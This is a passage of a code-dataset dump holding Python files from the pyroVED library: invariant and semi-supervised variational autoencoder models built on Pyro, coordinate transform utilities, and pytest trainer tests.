= init_dataloader(*data_val, **kwargs)\n return loader_unsup, loader_sup, loader_val\n" }, { "alpha_fraction": 0.5563721060752869, "alphanum_fraction": 0.5642588138580322, "avg_line_length": 38.99283218383789, "blob_id": "ea09e997d4f278c698ed57a17d6cbf8353d70575", "content_id": "bf20ff2761a53677b7700d026a302b4b0df5ec82", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11158, "license_type": "permissive", "max_line_length": 89, "num_lines": 279, "path": "/pyroved/models/ivae.py", "repo_name": "matthewcarbone/pyroVED", "src_encoding": "UTF-8", "text": "\"\"\"\nivae.py\n=======\n\nVariational autoencoder with invariance to rotations, translations, and scale\n\nCreated by Maxim Ziatdinov (email: [email protected])\n\"\"\"\n\nfrom typing import Optional, Tuple, Union, List\n\nimport pyro\nimport pyro.distributions as dist\nimport torch\n\nfrom pyroved.models.base import baseVAE\nfrom pyroved.nets import fcDecoderNet, fcEncoderNet, sDecoderNet\nfrom pyroved.utils import (\n generate_grid, generate_latent_grid, get_sampler,\n plot_img_grid, plot_spect_grid, set_deterministic_mode,\n to_onehot, transform_coordinates\n)\n\n\nclass iVAE(baseVAE):\n \"\"\"\n Variational autoencoder that enforces rotational, translational,\n and scale invariances.\n\n Args:\n data_dim:\n Dimensionality of the input data; use (height x width) for images\n or (length,) for spectra.\n latent_dim:\n Number of latent dimensions.\n invariances:\n List with invariances to enforce. For 2D systems, `r` enforces\n rotational invariance, `t` enforces invariance to\n translations, `sc` enforces a scale invariance, and\n invariances=None corresponds to vanilla VAE.\n For 1D systems, 't' enforces translational invariance and\n invariances=None is vanilla VAE\n c_dim:\n \"Feature dimension\" of the c vector in p(z|c) where z is\n explicitly conditioned on variable c. The latter can be continuous\n or discrete. For example, to train a class-conditional VAE on\n a dataset with 10 classes, the c_dim must be equal to 10 and\n the corresponding n x 10 vector should represent one-hot encoded labels.\n (The default c_dim value is 0, i.e. no conditioning is performed).\n hidden_dim_e:\n Number of hidden units per each layer in encoder (inference\n network). (The default is 128).\n hidden_dim_d:\n Number of hidden units per each layer in decoder (generator\n network). (The default is 128).\n num_layers_e:\n Number of layers in encoder (inference network). (The default is\n 2).\n num_layers_d:\n Number of layers in decoder (generator network). (The default is\n 2).\n activation:\n Non-linear activation for inner layers of encoder and decoder.\n The available activations are ReLU ('relu'), leaky ReLU ('lrelu'),\n hyberbolic tangent ('tanh'), softplus ('softplus'), and GELU ('gelu').\n (The default is 'tanh').\n sampler_d:\n Decoder sampler, as defined as p(x|z) = sampler(decoder(z)).\n The available samplers are 'bernoulli', 'continuous_bernoulli',\n and 'gaussian'. (The default is \"bernoulli\").\n sigmoid_d:\n Sigmoid activation for the decoder output. (The default is True).\n seed:\n Seed used in torch.manual_seed(seed) and\n torch.cuda.manual_seed_all(seed). (The default is 1).\n\n Keyword Args:\n device:\n Sets device to which model and data will be moved.\n Defaults to 'cuda:0' if a GPU is available and to CPU otherwise.\n dx_prior:\n Translational prior in x direction (float between 0 and 1)\n dy_prior:\n Translational prior in y direction (float between 0 and 1)\n sc_prior:\n Scale prior (usually, sc_prior << 1)\n decoder_sig:\n Sets sigma for a \"gaussian\" decoder sampler\n\n Examples:\n Initialize a VAE model with rotational invariance\n\n >>> data_dim = (28, 28)\n >>> rvae = iVAE(data_dim, latent_dim=2, invariances=['r'])\n\n Initialize a class-conditional VAE model with rotational and\n translational invarainces for dataset that has 10 classes\n\n >>> data_dim = (28, 28)\n >>> rvae = iVAE(data_dim, latent_dim=2, c_dim=10, invariances=['r', 't'])\n \"\"\"\n\n def __init__(\n self,\n data_dim: Tuple[int],\n latent_dim: int = 2,\n invariances: List[str] = None,\n c_dim: int = 0,\n hidden_dim_e: int = 128,\n hidden_dim_d: int = 128,\n num_layers_e: int = 2,\n num_layers_d: int = 2,\n activation: str = \"tanh\",\n sampler_d: str = \"bernoulli\",\n sigmoid_d: bool = True,\n seed: int = 1,\n **kwargs: Union[str, float]\n ) -> None:\n args = (data_dim, invariances)\n super(iVAE, self).__init__(*args, **kwargs)\n\n # Reset the pyro ParamStoreDict object's dictionaries\n pyro.clear_param_store()\n # Set all torch manual seeds\n set_deterministic_mode(seed)\n\n # Initialize the encoder network\n self.encoder_z = fcEncoderNet(\n data_dim, latent_dim + self.coord, 0, hidden_dim_e, num_layers_e,\n activation, softplus_out=True\n )\n # Initialize the decoder network\n dnet = sDecoderNet if 0 < self.coord < 5 else fcDecoderNet\n self.decoder = dnet(\n data_dim, latent_dim, c_dim, hidden_dim_d, num_layers_d,\n activation, sigmoid_out=sigmoid_d\n )\n # Initialize the decoder's sampler\n self.sampler_d = get_sampler(sampler_d, **kwargs)\n\n # Sets continuous and discrete dimensions\n self.z_dim = latent_dim + self.coord\n self.c_dim = c_dim\n\n # Move model parameters to appropriate device\n self.to(self.device)\n\n def model(self,\n x: torch.Tensor,\n y: Optional[torch.Tensor] = None,\n **kwargs: float) -> None:\n \"\"\"\n Defines the model p(x|z)p(z)\n \"\"\"\n # register PyTorch module `decoder` with Pyro\n pyro.module(\"decoder\", self.decoder)\n # KLD scale factor (see e.g. https://openreview.net/pdf?id=Sy2fzU9gl)\n beta = kwargs.get(\"scale_factor\", 1.)\n reshape_ = torch.prod(torch.tensor(x.shape[1:])).item()\n with pyro.plate(\"data\", x.shape[0]):\n # setup hyperparameters for prior p(z)\n z_loc = x.new_zeros(torch.Size((x.shape[0], self.z_dim)))\n z_scale = x.new_ones(torch.Size((x.shape[0], self.z_dim)))\n # sample from prior (value will be sampled by guide when computing the ELBO)\n with pyro.poutine.scale(scale=beta):\n z = pyro.sample(\"latent\", dist.Normal(z_loc, z_scale).to_event(1))\n if self.coord > 0: # rotationally- and/or translationaly-invariant mode\n # Split latent variable into parts for rotation\n # and/or translation and image content\n phi, dx, sc, z = self.split_latent(z)\n if 't' in self.invariances:\n dx = (dx * self.t_prior).unsqueeze(1)\n # transform coordinate grid\n grid = self.grid.expand(x.shape[0], *self.grid.shape)\n x_coord_prime = transform_coordinates(grid, phi, dx, sc)\n # Add class label (if any)\n if y is not None:\n z = torch.cat([z, y], dim=-1)\n # decode the latent code z together with the transformed coordinates (if any)\n dec_args = (x_coord_prime, z) if self.coord else (z,)\n loc = self.decoder(*dec_args)\n # score against actual images (\"binary cross-entropy loss\")\n pyro.sample(\n \"obs\", self.sampler_d(loc.view(-1, reshape_)).to_event(1),\n obs=x.view(-1, reshape_))\n\n def guide(self,\n x: torch.Tensor,\n y: Optional[torch.Tensor] = None,\n **kwargs: float) -> None:\n \"\"\"\n Defines the guide q(z|x)\n \"\"\"\n # register PyTorch module `encoder_z` with Pyro\n pyro.module(\"encoder_z\", self.encoder_z)\n # KLD scale factor (see e.g. https://openreview.net/pdf?id=Sy2fzU9gl)\n beta = kwargs.get(\"scale_factor\", 1.)\n with pyro.plate(\"data\", x.shape[0]):\n # use the encoder to get the parameters used to define q(z|x)\n z_loc, z_scale = self.encoder_z(x)\n # sample the latent code z\n with pyro.poutine.scale(scale=beta):\n pyro.sample(\"latent\", dist.Normal(z_loc, z_scale).to_event(1))\n\n def split_latent(self, z: torch.Tensor) -> Tuple[torch.Tensor]:\n \"\"\"\n Split latent variable into parts for rotation\n and/or translation and image content\n \"\"\"\n return self._split_latent(z)\n\n def encode(self, x_new: torch.Tensor, **kwargs: int) -> torch.Tensor:\n \"\"\"\n Encodes data using a trained inference (encoder) network\n\n Args:\n x_new:\n Data to encode with a trained (i)VAE model. The new data must have\n the same dimensions (images height and width or spectra length)\n as the one used for training.\n kwargs:\n Batch size as 'batch_size' (for encoding large volumes of data)\n \"\"\"\n z = self._encode(x_new)\n z_loc, z_scale = z.split(self.z_dim, 1)\n return z_loc, z_scale\n\n def decode(self,\n z: torch.Tensor,\n y: torch.Tensor = None,\n **kwargs: int) -> torch.Tensor:\n \"\"\"\n Decodes a batch of latent coordnates\n\n Args:\n z: Latent coordinates (without rotational and translational parts)\n y: Conditional \"property\" vector (e.g. one-hot encoded class vector)\n kwargs: Batch size as 'batch_size'\n \"\"\"\n z = z.to(self.device)\n if y is not None:\n z = torch.cat([z, y.to(self.device)], -1)\n loc = self._decode(z, **kwargs)\n return loc\n\n def manifold2d(self, d: int,\n y: torch.Tensor = None,\n plot: bool = True,\n **kwargs: Union[str, int, float]) -> torch.Tensor:\n \"\"\"\n Plots a learned latent manifold in the image space\n\n Args:\n d: Grid size\n plot: Plots the generated manifold (Default: True)\n y: Conditional \"property\" vector (e.g. one-hot encoded class vector)\n kwargs: Keyword arguments include custom min/max values\n for grid boundaries passed as 'z_coord'\n (e.g. z_coord = [-3, 3, -3, 3]), 'angle' and\n 'shift' to condition a generative model on, and plot parameters\n ('padding', 'padding_value', 'cmap', 'origin', 'ylim')\n \"\"\"\n z, (grid_x, grid_y) = generate_latent_grid(d, **kwargs)\n z = [z]\n if self.c_dim > 0:\n if y is None:\n raise ValueError(\"To generate a manifold pass a conditional vector y\") \n y = y.unsqueeze(1) if 0 < y.ndim < 2 else y\n z = z + [y.expand(z[0].shape[0], *y.shape[1:])]\n loc = self.decode(*z, **kwargs)\n if plot:\n if self.ndim == 2:\n plot_img_grid(\n loc, d,\n extent=[grid_x.min(), grid_x.max(), grid_y.min(), grid_y.max()],\n **kwargs)\n elif self.ndim == 1:\n plot_spect_grid(loc, d, **kwargs)\n return loc\n" }, { "alpha_fraction": 0.6275473237037659, "alphanum_fraction": 0.6422852873802185, "avg_line_length": 41.604652404785156, "blob_id": "40549df54654bb13b3e9f97de1c0699c15a533fb", "content_id": "ca4903eaf2da72cbfb39dc9fec3234eebcd71004", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5496, "license_type": "permissive", "max_line_length": 85, "num_lines": 129, "path": "/tests/test_trainers.py", "repo_name": "matthewcarbone/pyroVED", "src_encoding": "UTF-8", "text": "import sys\nfrom copy import deepcopy as dc\n\nimport torch\nimport pyro.distributions as dist\nimport pytest\nimport numpy as np\nfrom numpy.testing import assert_\n\nsys.path.append(\"../../\")\n\nfrom pyroved import models, utils, trainers\n\ntt = torch.tensor\n\n\ndef assert_weights_equal(m1, m2):\n eq_w = []\n for p1, p2 in zip(m1.values(), m2.values()):\n eq_w.append(np.array_equal(\n p1.detach().cpu().numpy(),\n p2.detach().cpu().numpy()))\n return all(eq_w)\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['t'], ['r', 't', 's']])\ndef test_svi_trainer_trvae(invariances):\n data_dim = (5, 8, 8)\n train_data = torch.randn(*data_dim)\n test_data = torch.randn(*data_dim)\n train_loader = utils.init_dataloader(train_data, batch_size=2)\n test_loader = utils.init_dataloader(test_data, batch_size=2)\n vae = models.iVAE(data_dim[1:], 2, invariances)\n trainer = trainers.SVItrainer(vae)\n weights_before = dc(vae.state_dict())\n for _ in range(2):\n trainer.step(train_loader, test_loader)\n weights_after = vae.state_dict()\n assert_(not torch.isnan(tt(trainer.loss_history[\"training_loss\"])).any())\n assert_(not assert_weights_equal(weights_before, weights_after))\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['t'], ['r', 't', 's']])\ndef test_svi_trainer_jtrvae(invariances):\n data_dim = (6, 8, 8)\n train_data = torch.randn(*data_dim)\n train_loader = utils.init_dataloader(train_data, batch_size=2)\n vae = models.jiVAE(data_dim[1:], 2, 3, invariances)\n trainer = trainers.SVItrainer(vae, enumerate_parallel=True)\n weights_before = dc(vae.state_dict())\n for _ in range(2):\n trainer.step(train_loader)\n weights_after = vae.state_dict()\n assert_(not torch.isnan(tt(trainer.loss_history[\"training_loss\"])).any())\n assert_(not assert_weights_equal(weights_before, weights_after))\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['t'], ['r', 't', 's']])\ndef test_auxsvi_trainer_cls(invariances):\n data_dim = (5, 8, 8)\n train_unsup = torch.randn(data_dim[0], torch.prod(tt(data_dim[1:])).item())\n train_sup = train_unsup + .1 * torch.randn_like(train_unsup)\n labels = dist.OneHotCategorical(torch.ones(data_dim[0], 3)).sample()\n loader_unsup, loader_sup, loader_val = utils.init_ssvae_dataloaders(\n train_unsup, (train_sup, labels), (train_sup, labels), batch_size=2)\n vae = models.ssiVAE(data_dim[1:], 2, 3, invariances)\n trainer = trainers.auxSVItrainer(vae)\n weights_before = dc(vae.state_dict())\n for _ in range(2):\n trainer.step(loader_unsup, loader_sup, loader_val)\n weights_after = vae.state_dict()\n assert_(not torch.isnan(tt(trainer.history[\"training_loss\"])).any())\n assert_(not assert_weights_equal(weights_before, weights_after))\n\n\[email protected](\"c_dim\", [1, 2])\[email protected](\"invariances\", [None, ['r'], ['s'], ['t'], ['r', 't', 's']])\ndef test_auxsvi_trainer_reg(c_dim, invariances):\n data_dim = (5, 8, 8)\n train_unsup = torch.randn(data_dim[0], torch.prod(tt(data_dim[1:])).item())\n train_sup = train_unsup + .1 * torch.randn_like(train_unsup)\n gt = torch.randn(data_dim[0], c_dim)\n\n loader_unsup, loader_sup, loader_val = utils.init_ssvae_dataloaders(\n train_unsup, (train_sup, gt), (train_sup, gt), batch_size=2)\n vae = models.ss_reg_iVAE(data_dim[1:], 2, c_dim, invariances)\n trainer = trainers.auxSVItrainer(vae, task=\"regression\")\n weights_before = dc(vae.state_dict())\n for _ in range(2):\n trainer.step(loader_unsup, loader_sup, loader_val)\n weights_after = vae.state_dict()\n assert_(not torch.isnan(tt(trainer.history[\"training_loss\"])).any())\n assert_(not assert_weights_equal(weights_before, weights_after))\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['t'], ['r', 't', 's']])\ndef test_auxsvi_trainer_swa(invariances):\n data_dim = (5, 8, 8)\n train_unsup = torch.randn(data_dim[0], torch.prod(tt(data_dim[1:])).item())\n train_sup = train_unsup + .1 * torch.randn_like(train_unsup)\n labels = dist.OneHotCategorical(torch.ones(data_dim[0], 3)).sample()\n loader_unsup, loader_sup, _ = utils.init_ssvae_dataloaders(\n train_unsup, (train_sup, labels), (train_sup, labels), batch_size=2)\n vae = models.ssiVAE(data_dim[1:], 2, 3, invariances)\n trainer = trainers.auxSVItrainer(vae)\n for _ in range(3):\n trainer.step(loader_unsup, loader_sup)\n trainer.save_running_weights(\"encoder_y\")\n weights_final = dc(vae.encoder_y.state_dict())\n trainer.average_weights(\"encoder_y\")\n weights_aver = vae.encoder_y.state_dict()\n assert_(not assert_weights_equal(weights_final, weights_aver))\n\n\[email protected](\"input_dim, output_dim\",\n [((8,), (8, 8)), ((8, 8), (8,)),\n ((8,), (8,)), ((8, 8), (8, 8))])\ndef test_svi_trainer_ved(input_dim, output_dim):\n train_data_x = torch.randn(5, 1, *input_dim)\n train_data_y = torch.randn(5, 1, *output_dim)\n train_loader = utils.init_dataloader(train_data_x, train_data_y, batch_size=2)\n vae = models.VED(input_dim, output_dim)\n trainer = trainers.SVItrainer(vae)\n weights_before = dc(vae.state_dict())\n for _ in range(2):\n trainer.step(train_loader)\n weights_after = vae.state_dict()\n assert_(not torch.isnan(tt(trainer.loss_history[\"training_loss\"])).any())\n assert_(not assert_weights_equal(weights_before, weights_after))\n" }, { "alpha_fraction": 0.561215341091156, "alphanum_fraction": 0.5846738219261169, "avg_line_length": 32.654136657714844, "blob_id": "1b240d37b807b1887a6d79305bc6990135b80ab0", "content_id": "6bab0c3ff5ec6ab9b6bb3581b59443d41eb9b660", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4476, "license_type": "permissive", "max_line_length": 78, "num_lines": 133, "path": "/pyroved/utils/coord.py", "repo_name": "matthewcarbone/pyroVED", "src_encoding": "UTF-8", "text": "from typing import Union, Tuple\nimport torch\nimport pyro.distributions as dist\ntt = torch.tensor\n\n\ndef grid2xy(X1: torch.Tensor, X2: torch.Tensor) -> torch.Tensor:\n X = torch.cat((X1[None], X2[None]), 0)\n d0, d1 = X.shape[0], X.shape[1] * X.shape[2]\n X = X.reshape(d0, d1).T\n return X\n\n\ndef imcoordgrid(im_dim: Tuple[int]) -> torch.Tensor:\n xx = torch.linspace(-1, 1, im_dim[0])\n yy = torch.linspace(1, -1, im_dim[1])\n x0, x1 = torch.meshgrid(xx, yy)\n return grid2xy(x0, x1)\n\n\ndef generate_grid(data_dim: Tuple[int]) -> torch.Tensor:\n \"\"\"Generates 1D or 2D grid of coordinates. Returns a torch tensor with two\n axes. If the input data_dim indicates only one dimensional data, then the\n output will be a 2d torch tensor artificially augmented along the last\n dimension, of shape [N, 1].\n\n Args:\n data_dim:\n Dimensions of the input data.\n\n Raises:\n NotImplementedError:\n If the dimension (length) of the provided data_dim is not equal to\n 1 or 2.\n\n Returns:\n The grid (always 2d).\n \"\"\"\n\n if len(data_dim) not in [1, 2]:\n raise NotImplementedError(\"Currently supports only 1D and 2D data\")\n if len(data_dim) == 1:\n return torch.linspace(-1, 1, data_dim[0])[:, None]\n return imcoordgrid(data_dim)\n\n\ndef transform_coordinates(coord: torch.Tensor,\n phi: Union[torch.Tensor, float] = 0,\n coord_dx: Union[torch.Tensor, float] = 0,\n scale: Union[torch.Tensor, float] = 1.,\n ) -> torch.Tensor:\n \"\"\"\n Rotation of 2D coordinates followed by scaling and translation.\n For 1D grid, there is only transaltion. Operates on batches.\n \"\"\"\n if coord.shape[-1] == 1:\n return coord + coord_dx\n coord = rotate_coordinates(coord, phi)\n coord = scale_coordinates(coord, scale)\n return coord + coord_dx\n\n\ndef rotate_coordinates(coord: torch.Tensor,\n phi: Union[torch.Tensor, float] = 0\n ) -> torch.Tensor:\n \"\"\"\n Rotation of 2D coordinates. Operates on batches\n \"\"\"\n if torch.sum(phi) == 0:\n phi = coord.new_zeros(coord.shape[0])\n rotmat_r1 = torch.stack([torch.cos(phi), torch.sin(phi)], 1)\n rotmat_r2 = torch.stack([-torch.sin(phi), torch.cos(phi)], 1)\n rotmat = torch.stack([rotmat_r1, rotmat_r2], axis=1)\n coord = torch.bmm(coord, rotmat)\n return coord\n\n\ndef scale_coordinates(coord: torch.Tensor,\n scale: torch.Tensor\n ) -> torch.Tensor:\n \"\"\"\n Scaling of 2D coordinates. Operates on batches\n \"\"\"\n scalemat = coord.new_zeros(coord.shape[0], 2, 2)\n scalemat[:, 0, 0] = scale\n scalemat[:, 1, 1] = scale\n coord = torch.bmm(coord, scalemat)\n return coord\n\n\ndef generate_latent_grid(d: int, **kwargs) -> torch.Tensor:\n \"\"\"\n Generates a grid of latent space coordinates\n \"\"\"\n if isinstance(d, int):\n d = [d, d]\n z_coord = kwargs.get(\"z_coord\")\n if z_coord:\n z1, z2, z3, z4 = z_coord\n grid_x = torch.linspace(z2, z1, d[0])\n grid_y = torch.linspace(z3, z4, d[1])\n else:\n grid_x = dist.Normal(0, 1).icdf(torch.linspace(0.95, 0.05, d[0]))\n grid_y = dist.Normal(0, 1).icdf(torch.linspace(0.05, 0.95, d[1]))\n z = []\n for xi in grid_x:\n for yi in grid_y:\n z.append(tt([xi, yi]).float().unsqueeze(0))\n return torch.cat(z), (grid_x, grid_y)\n\n\ndef generate_latent_grid_traversal(d: int, cont_dim: int, disc_dim,\n cont_idx: int, cont_idx_fixed: int,\n num_samples: int) -> Tuple[torch.Tensor]:\n \"\"\"\n Generates continuous and discrete grids for latent space traversal\n \"\"\"\n # Get continuous latent coordinates\n samples_cont = torch.zeros(size=(num_samples, cont_dim)) + cont_idx_fixed\n cont_traversal = dist.Normal(0, 1).icdf(torch.linspace(0.95, 0.05, d))\n for i in range(d):\n for j in range(d):\n samples_cont[i * d + j, cont_idx] = cont_traversal[j]\n # Get discrete latent coordinates\n n = torch.arange(0, disc_dim)\n n = n.tile(d // disc_dim + 1)[:d]\n samples_disc = []\n for i in range(d):\n samples_disc_i = torch.zeros((d, disc_dim))\n samples_disc_i[:, n[i]] = 1\n samples_disc.append(samples_disc_i)\n samples_disc = torch.cat(samples_disc)\n return samples_cont, samples_disc\n" }, { "alpha_fraction": 0.5512986183166504, "alphanum_fraction": 0.5562087893486023, "avg_line_length": 39.83905029296875, "blob_id": "3d55e6c4b764ebeea270602f743c85ce55554dc8", "content_id": "20eb7bbee83d224e6048e9e35ccaa0f41f1c21fd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15478, "license_type": "permissive", "max_line_length": 90, "num_lines": 379, "path": "/pyroved/models/ssivae.py", "repo_name": "matthewcarbone/pyroVED", "src_encoding": "UTF-8", "text": "\"\"\"\nssivae.py\n=========\n\nSemi-supervised variational autoencoder for data\nwith orientational, positional and scale disorders\n\nCreated by Maxim Ziatdinov (email: [email protected])\n\"\"\"\nfrom typing import Optional, Tuple, Union, Type, List\n\nimport pyro\nimport pyro.distributions as dist\nimport torch\n\nfrom .base import baseVAE\nfrom ..nets import fcDecoderNet, fcEncoderNet, sDecoderNet, fcClassifierNet\nfrom ..utils import (generate_grid, get_sampler, plot_img_grid,\n plot_spect_grid, set_deterministic_mode, to_onehot,\n transform_coordinates, init_dataloader, generate_latent_grid,\n generate_latent_grid_traversal, plot_grid_traversal)\n\ntt = torch.tensor\n\n\nclass ssiVAE(baseVAE):\n \"\"\"\n Semi-supervised variational autoencoder with the enforcement\n of rotational, translational, and scale invariances. It allows performing\n a classification of image/spectral data given a small number of examples\n even in the presence of a distribution shift between the labeled and unlabeled parts.\n\n Args:\n data_dim:\n Dimensionality of the input data; use (h x w) for images\n or (length,) for spectra.\n latent_dim:\n Number of latent dimensions.\n num_classes:\n Number of classes in the classification scheme\n invariances:\n List with invariances to enforce. For 2D systems, `r` enforces\n rotational invariance, `t` enforces invariance to\n translations, `sc` enforces a scale invariance, and\n invariances=None corresponds to vanilla VAE.\n For 1D systems, 't' enforces translational invariance and\n invariances=None is vanilla VAE\n hidden_dim_e:\n Number of hidden units per each layer in encoder (inference network).\n hidden_dim_d:\n Number of hidden units per each layer in decoder (generator network).\n hidden_dim_cls:\n Number of hidden units (\"neurons\") in each layer of classifier\n num_layers_e:\n Number of layers in encoder (inference network).\n num_layers_d:\n Number of layers in decoder (generator network).\n num_layers_cls:\n Number of layers in classifier\n activation:\n Non-linear activation for inner layers of both encoder and the decoder.\n The available activations are ReLU ('relu'), leaky ReLU ('lrelu'),\n hyberbolic tangent ('tanh'), softplus ('softplus'), and GELU ('gelu').\n (The default is \"tanh\").\n sampler_d:\n Decoder sampler, as defined as p(x|z) = sampler(decoder(z)).\n The available samplers are 'bernoulli', 'continuous_bernoulli',\n and 'gaussian' (Default: 'bernoulli').\n sigmoid_d:\n Sigmoid activation for the decoder output (Default: True)\n seed:\n Seed used in torch.manual_seed(seed) and\n torch.cuda.manual_seed_all(seed)\n\n Keyword Args:\n device:\n Sets device to which model and data will be moved.\n Defaults to 'cuda:0' if a GPU is available and to CPU otherwise.\n dx_prior:\n Translational prior in x direction (float between 0 and 1)\n dy_prior:\n Translational prior in y direction (float between 0 and 1)\n sc_prior:\n Scale prior (usually, sc_prior << 1)\n decoder_sig:\n Sets sigma for a \"gaussian\" decoder sampler\n\n Examples:\n\n Initialize a VAE model with rotational invariance for\n semi-supervised learning of the dataset that has 10 classes\n\n >>> data_dim = (28, 28)\n >>> ssvae = ssiVAE(data_dim, latent_dim=2, num_classes=10, invariances=['r'])\n \"\"\"\n def __init__(self,\n data_dim: Tuple[int],\n latent_dim: int,\n num_classes: int,\n invariances: List[str] = None,\n hidden_dim_e: int = 128,\n hidden_dim_d: int = 128,\n hidden_dim_cls: int = 128,\n num_layers_e: int = 2,\n num_layers_d: int = 2,\n num_layers_cls: int = 2,\n activation: str = \"tanh\",\n sampler_d: str = \"bernoulli\",\n sigmoid_d: bool = True,\n seed: int = 1,\n **kwargs: Union[str, float]\n ) -> None:\n \"\"\"\n Initializes ss-iVAE parameters\n \"\"\"\n args = (data_dim, invariances)\n super(ssiVAE, self).__init__(*args, **kwargs)\n pyro.clear_param_store()\n set_deterministic_mode(seed)\n\n self.data_dim = data_dim\n\n # Initialize z-Encoder neural network\n self.encoder_z = fcEncoderNet(\n data_dim, latent_dim+self.coord, num_classes,\n hidden_dim_e, num_layers_e, activation, flat=False)\n\n # Initialize y-Encoder neural network\n self.encoder_y = fcClassifierNet(\n data_dim, num_classes, hidden_dim_cls, num_layers_cls,\n activation)\n\n # Initializes Decoder neural network\n dnet = sDecoderNet if 0 < self.coord < 5 else fcDecoderNet\n self.decoder = dnet(\n data_dim, latent_dim, num_classes, hidden_dim_d,\n num_layers_d, activation, sigmoid_out=sigmoid_d,\n unflat=False)\n self.sampler_d = get_sampler(sampler_d, **kwargs)\n\n # Sets continuous and discrete dimensions\n self.z_dim = latent_dim + self.coord\n self.num_classes = num_classes\n\n # Send model parameters to their appropriate devices.\n self.to(self.device)\n\n def model(self,\n xs: torch.Tensor,\n ys: Optional[torch.Tensor] = None,\n **kwargs: float) -> None:\n \"\"\"\n Model of the generative process p(x|z,y)p(y)p(z)\n \"\"\"\n pyro.module(\"ss_vae\", self)\n batch_dim = xs.size(0)\n specs = dict(dtype=xs.dtype, device=xs.device)\n beta = kwargs.get(\"scale_factor\", 1.)\n # pyro.plate enforces independence between variables in batches xs, ys\n with pyro.plate(\"data\"):\n # sample the latent vector from the constant prior distribution\n prior_loc = torch.zeros(batch_dim, self.z_dim, **specs)\n prior_scale = torch.ones(batch_dim, self.z_dim, **specs)\n with pyro.poutine.scale(scale=beta):\n zs = pyro.sample(\n \"z\", dist.Normal(prior_loc, prior_scale).to_event(1))\n # split latent variable into parts for rotation and/or translation\n # and image content\n if self.coord > 0:\n phi, dx, sc, zs = self.split_latent(zs)\n if 't' in self.invariances:\n dx = (dx * self.t_prior).unsqueeze(1)\n # transform coordinate grid\n if 'r' in self.invariances:\n expdim = phi.shape[0]\n elif 't' in self.invariances:\n expdim = dx.shape[0]\n elif 's' in self.invariances:\n expdim = sc.shape[0]\n grid = self.grid.expand(expdim, *self.grid.shape)\n x_coord_prime = transform_coordinates(grid, phi, dx, sc)\n # sample label from the constant prior or observe the value\n alpha_prior = (torch.ones(batch_dim, self.num_classes, **specs) /\n self.num_classes)\n ys = pyro.sample(\"y\", dist.OneHotCategorical(alpha_prior), obs=ys)\n # Score against the parametrized distribution\n # p(x|y,z) = bernoulli(decoder(y,z))\n d_args = (x_coord_prime, [zs, ys]) if self.coord else ([zs, ys],)\n loc = self.decoder(*d_args)\n loc = loc.view(*ys.shape[:-1], -1)\n pyro.sample(\"x\", self.sampler_d(loc).to_event(1), obs=xs)\n\n def guide(self, xs: torch.Tensor,\n ys: Optional[torch.Tensor] = None,\n **kwargs: float) -> None:\n \"\"\"\n Guide q(z|y,x)q(y|x)\n \"\"\"\n beta = kwargs.get(\"scale_factor\", 1.)\n with pyro.plate(\"data\"):\n # sample and score the digit with the variational distribution\n # q(y|x) = categorical(alpha(x))\n if ys is None:\n alpha = self.encoder_y(xs)\n ys = pyro.sample(\"y\", dist.OneHotCategorical(alpha))\n # sample (and score) the latent vector with the variational\n # distribution q(z|x,y) = normal(loc(x,y),scale(x,y))\n loc, scale = self.encoder_z([xs, ys])\n with pyro.poutine.scale(scale=beta):\n pyro.sample(\"z\", dist.Normal(loc, scale).to_event(1))\n\n def split_latent(self, zs: torch.Tensor) -> Tuple[torch.Tensor]:\n \"\"\"\n Split latent variable into parts with rotation and/or translation\n and image content\n \"\"\"\n zdims = list(zs.shape)\n zdims[-1] = zdims[-1] - self.coord\n zs = zs.view(-1, zs.size(-1))\n # For 1D, there is only translation\n phi, dx, sc, zs = self._split_latent(zs)\n return phi, dx, sc, zs.view(*zdims)\n\n def model_aux(self, xs: torch.Tensor,\n ys: Optional[torch.Tensor] = None,\n **kwargs: float) -> None:\n \"\"\"\n Models an auxiliary (supervised) loss\n \"\"\"\n pyro.module(\"ss_vae\", self)\n with pyro.plate(\"data\"):\n # the extra term to yield an auxiliary loss\n aux_loss_multiplier = kwargs.get(\"aux_loss_multiplier\", 20)\n if ys is not None:\n alpha = self.encoder_y.forward(xs)\n with pyro.poutine.scale(scale=aux_loss_multiplier):\n pyro.sample(\"y_aux\", dist.OneHotCategorical(alpha), obs=ys)\n\n def guide_aux(self, xs, ys=None, **kwargs):\n \"\"\"\n Dummy guide function to accompany model_classify\n \"\"\"\n pass\n\n def set_classifier(self, cls_net: Type[torch.nn.Module]) -> None:\n \"\"\"\n Sets a user-defined classification network\n \"\"\"\n self.encoder_y = cls_net\n\n def classifier(self,\n x_new: torch.Tensor,\n **kwargs: int) -> torch.Tensor:\n \"\"\"\n Classifies data\n\n Args:\n x_new:\n Data to classify with a trained ss-iVAE. The new data must have\n the same dimensions (images height x width or spectra length)\n as the one used for training.\n kwargs:\n Batch size as 'batch_size' (for encoding large volumes of data)\n \"\"\"\n def classify(x_i) -> torch.Tensor:\n with torch.no_grad():\n alpha = self.encoder_y(x_i)\n _, predicted = torch.max(alpha.data, 1)\n return predicted.cpu()\n\n x_new = init_dataloader(x_new, shuffle=False, **kwargs)\n y_predicted = []\n for (x_i,) in x_new:\n y_predicted.append(classify(x_i.to(self.device)))\n return torch.cat(y_predicted)\n\n def encode(self,\n x_new: torch.Tensor,\n y: Optional[torch.Tensor] = None,\n **kwargs: int) -> torch.Tensor:\n \"\"\"\n Encodes data using a trained inference (encoder) network\n\n Args:\n x_new:\n Data to encode with a trained iVAE. The new data must have\n the same dimensions (images height and width or spectra length)\n as the one used for training.\n y:\n Classes as one-hot vectors for each sample in x_new. If not provided,\n the ss-iVAE's classifier will be used to predict the classes.\n kwargs:\n Batch size as 'batch_size' (for encoding large volumes of data)\n \"\"\"\n if y is None:\n y = self.classifier(x_new, **kwargs)\n if y.ndim < 2:\n y = to_onehot(y, self.num_classes)\n z = self._encode(x_new, y, **kwargs)\n z_loc, z_scale = z.split(self.z_dim, 1)\n _, y_pred = torch.max(y, 1)\n return z_loc, 